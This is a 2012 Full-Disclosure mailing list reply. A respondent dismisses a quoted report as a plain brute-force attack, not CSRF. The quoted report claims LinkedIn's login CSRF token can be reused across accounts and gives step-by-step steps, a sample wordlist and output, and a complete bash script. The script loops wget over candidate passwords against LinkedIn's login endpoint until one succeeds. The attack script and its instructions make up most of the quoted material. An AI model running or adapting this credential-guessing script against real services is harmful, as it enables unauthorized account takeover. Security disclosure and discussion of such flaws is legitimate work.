Re: LinkedIn CSRF: Login Brute Force

[Julius Kivimäki <julius.kivimaki () gmail com>]

Where's the csrf? All I see here is an useless bruteforce attack.

2012/5/17 Fernando A. Lagos B. <fernando () zerial org>

> LinkedIn uses a Token into the login form which can be used many times
> for different usernames. You can do it using the same IP or differents
> IP, the token will not be verified.
>
>
>
> I. Step by step
> ===============
> 1). Login into your LinkedIn account and capture the "sourceAlias" and
> "csrfToken" variable (example:
>
> sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi&csrfToken=ajax%3A6265303044444817496)
>
> 2). Use the Token to login into another account:
>
> https://www.linkedin.com/uas/login-submit?csrfToken=ajax%3A6265303044444817496&session_key=somebody () somedomain 
> com&session_password=ANY_PASSWORD&session_redirect=&sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi&source_app=&trk=secureless
>
> session_key is the username and session_password is the password.
>
> 3). The password (session_password) is not correct If the requested URL
> returns "The email address or password you provided does not match our
> records", else the password if correct.
>
>
>
> II. PoC
> =======
>
> 1). The Wordlist (filename: w)
> [zerial@belcebu ~]$ cat w
> asdfgh
> zxcvbnm
> 1234567
> 0987654
> 12345698
> 456_4567
> 123456qwert
> qwsdcv
> 12wedfgh
> 123456qwerty
> 12345qwei
> 112233
> [zerial@belcebu ~]$
>
>
> 2). Executing the script:
> [zerial@belcebu ~]$ sh linkedin.sh panic () zerial org w
> Password found: qwsdcv
> [zerial@belcebu ~]$
>
> This is the correct password for this test user.
>
>
>
>
> III. Script
> ===========
>
> #!/bin/bash
> #
> # usage: ./linkedin.sh username () domain com wordlist
> #
>
> TOKEN="ajax%3A6265303044444817496"
> sourceAlias="0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi"
>
> if [ ! -f $2 ];
> then
>        echo "file $2 does not exists"
>        exit
> fi
>
> _USR=$1
> for _PWD in $(cat $2);
> do
>        if [ $(echo -n $_PWD|wc -c) -lt 6 ];
>        then
>                echo "Ignoring $_PWD (must be grather than 6 chars)";
> continue
>        fi
>        wget -o /dev/null -O -
> "
> https://www.linkedin.com/uas/login-submit?csrfToken=$TOKEN&session_key=$_USR&session_password=$_PWD&session_redirect=&sourceAlias=$sourceAlias&source_app=&trk=secureless
> "|grep
> 'The email address or password you provided does not match our
> records\|captcha' >>/dev/null
>        if [ $? -eq 1 ];
>        then
>                echo "Password found: $_PWD"; exit;
>        fi
> done
>
> echo "Password NOT found. Try later."
> #EOF
>
>
>
>
>
> More info (in spanish):
>
> http://blog.zerial.org/seguridad/vulnerabilidad-en-linkedin-permite-obtencion-de-contrasenas/
>
>
>
>
> cheers,
> --
> Fernando A. Lagos Berardi
> Seguridad Informatica
> GNU/Linux User #382319
> Blog: http://blog.zerial.org
> Jabber: zerial () jabberes org
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/